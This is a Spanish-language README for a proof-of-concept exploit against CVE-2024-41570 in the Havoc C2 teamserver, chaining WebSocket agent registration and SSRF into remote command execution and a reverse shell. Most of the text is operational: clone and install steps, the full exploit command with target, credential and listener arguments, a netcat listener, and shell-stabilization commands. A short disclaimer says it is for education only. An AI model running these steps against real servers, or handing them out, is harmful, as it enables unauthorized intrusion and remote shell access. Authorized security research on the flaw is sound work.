
Exploit automatizado de reverse shell vía WebSocket | Havoc-C2-SSRF con RCE
Este proyecto proporciona un script de prueba de concepto (PoC) basado en Python para explotar un servicio vulnerable basado en WebSocket. El script automatiza el registro de agentes, la entrega de payloads WebSocket y la ejecución remota de comandos para establecer una shell inversa.
pip install -r requirements.txt
git clone https://github.com/kit4py/CVE-2024-41570.git
cd CVE-2024-41570
pip install -r requirements.txt
Ejecuta el script con los argumentos requeridos:
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
-t: URL objetivo del servidor WebSocket.-i: Dirección IP del Team Server de Havoc.-p: Puerto del Team Server de Havoc.-U: Nombre de usuario para la autenticación WebSocket.-P: Contraseña para la autenticación WebSocket.-l: IP del listener para la shell inversa (tu máquina).-L: Puerto del listener para la shell inversa (tu máquina).python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
nc -lvnp <listener_port>
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
El script requiere las siguientes librerías de Python:
requestspycryptodomeInstálalas usando el comando:
pip install -r requirements.txt
Este script está destinado únicamente a fines educativos. Asegúrate de tener autorización explícita para probar el sistema objetivo. El uso indebido de este script puede violar leyes y pautas éticas.
Inspirado por Default Havoc Poc
¡Las contribuciones son bienvenidas! No dudes en hacer un fork del repositorio y enviar un pull request.
Este proyecto está licenciado bajo la Licencia MIT. Consulta el archivo LICENSE para más detalles.